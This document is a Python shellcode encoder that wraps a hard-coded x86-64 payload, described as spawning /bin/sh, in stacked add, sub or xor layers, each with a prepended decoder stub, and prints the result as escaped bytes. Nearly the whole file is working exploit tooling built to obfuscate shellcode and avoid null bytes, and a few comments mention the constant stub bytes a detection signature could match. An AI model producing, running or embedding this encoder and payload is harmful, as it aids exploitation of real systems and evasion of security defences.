#!/usr/bin/env python3
"""Layered single-byte shellcode encoder (add / sub / xor) with a prepended decoder stub.

Each layer combines every payload byte with one 8-bit key and prefixes a fixed
decoder stub that carries that key and the payload length; main() stacks
layers by feeding the previous output (stub included) back into encode().
"""
import sys
from binascii import hexlify
# execve /bin/sh
# Payload bytes. The line above is the author's description; nothing on this
# page disassembles the bytes, so treat them as an opaque sample rather than a
# verified property.
SC = b"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
# Decoder stubs. encode() patches two placeholders: %SC_LEN% becomes the single
# byte bytes([len(payload)]) - so one layer can wrap at most 255 bytes - and
# %VAL% becomes the single key byte. The three stubs are byte-identical except
# for the byte following \x80 (\x6c, \x44, \x74 respectively); presumably that
# is the opcode undoing the chosen transform - not verified here. Every other
# stub byte is constant across all outputs, which is what a byte-signature for
# this encoder family would key on.
ADD_DECODER = b"\xeb\x12\x5e\x48\x31\xc9\xb1%SC_LEN%\x80\x6c\x0e\xff%VAL%\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff"
SUB_DECODER = b"\xeb\x12\x5e\x48\x31\xc9\xb1%SC_LEN%\x80\x44\x0e\xff%VAL%\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff"
XOR_DECODER = b"\xeb\x12\x5e\x48\x31\xc9\xb1%SC_LEN%\x80\x74\x0e\xff%VAL%\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff"
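def encode(sc, action, value):
    """Apply one single-byte transform layer to *sc* and prepend its decoder stub.

    Every byte of *sc* is combined with *value* (``add``, ``sub`` or ``xor``,
    all modulo 256), then the matching stub is prefixed with its ``%SC_LEN%``
    and ``%VAL%`` placeholders patched to the transformed payload's length and
    the key. Both placeholders become a single byte, so *value* must be 0-255
    and the payload at most 255 bytes. The original surfaced those limits only
    as an obscure ValueError from ``bytes([...])`` and an unknown *action* as
    an UnboundLocalError on ``decoder``; both are now checked up front.

    Args:
        sc: payload bytes (any iterable of ints 0-255).
        action: ``'add'``, ``'sub'`` or ``'xor'``.
        value: one-byte key, 0-255.

    Returns:
        bytes: decoder stub followed by the transformed payload.

    Raises:
        ValueError: unknown *action*, *value* outside 0-255, or more than
            255 payload bytes.
    """
    # Each action pairs its stub with the byte transform the stub is presumed
    # to undo (the stub bytes themselves are not decoded on this page).
    transforms = {
        'add': (ADD_DECODER, lambda b: (b + value) % 256),
        'sub': (SUB_DECODER, lambda b: (b - value) % 256),
        'xor': (XOR_DECODER, lambda b: (b ^ value) % 256),
    }
    if action not in transforms:
        raise ValueError(f"unknown action {action!r}; expected 'add', 'sub' or 'xor'")
    if not 0 <= value <= 255:
        raise ValueError(f"value must be 0-255, got {value}")
    decoder, transform = transforms[action]
    new_sc = bytes(transform(b) for b in sc)
    if len(new_sc) > 255:
        raise ValueError(
            f"payload is {len(new_sc)} bytes; the stub's length field holds at most 255"
        )
    # Length and key are single bytes; a 0 in either position is the null
    # byte that main() warns about.
    decoder = decoder.replace(b"%SC_LEN%", bytes([len(new_sc)]))
    decoder = decoder.replace(b"%VAL%", bytes([value]))
    return decoder + new_sc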
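def main():
    """Encode SC with the action/value layers given on the command line and print it.

    Arguments come as ``ACTION VALUE`` pairs (ACTION is add, sub or xor, VALUE
    the one-byte key). Layers apply left to right, each wrapping the previous
    output including its stub; with no arguments the raw payload is printed.
    When the arguments do not come in pairs a usage line goes to stderr and
    the process exits with status 2 (the original indexed past the end of
    argv instead).
    """
    args = sys.argv[1:]
    if len(args) % 2:
        print(f"usage: {sys.argv[0]} [add|sub|xor VALUE] ...", file=sys.stderr)
        raise SystemExit(2)
    layers = [(args[i], int(args[i + 1])) for i in range(0, len(args), 2)]
    print(f"[*] Raw shellcode length: {len(SC)}")
    encoded = SC
    for action, value in layers:
        encoded = encode(encoded, action, value)
    # A 0x00 anywhere in the result (payload, patched length or key byte) is
    # reported, not fixed.
    if b'\x00' in encoded:
        print("[!] Warning: null byte found in encoded shellcode!")
    print(f"[*] Final encoded shellcode + decoder length: {len(encoded)}")
    print("[+] Shellcode: ")
    # Render as \xNN escapes, one per byte, lowercase as hexlify produces.
    hex_bytes = (hexlify(bytes([b])).decode('utf-8') for b in encoded)
    print("\\x" + "\\x".join(hex_bytes))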
if __name__ == "__main__":
    # CLI entry point; importing the module for encode() does not run it.
    main()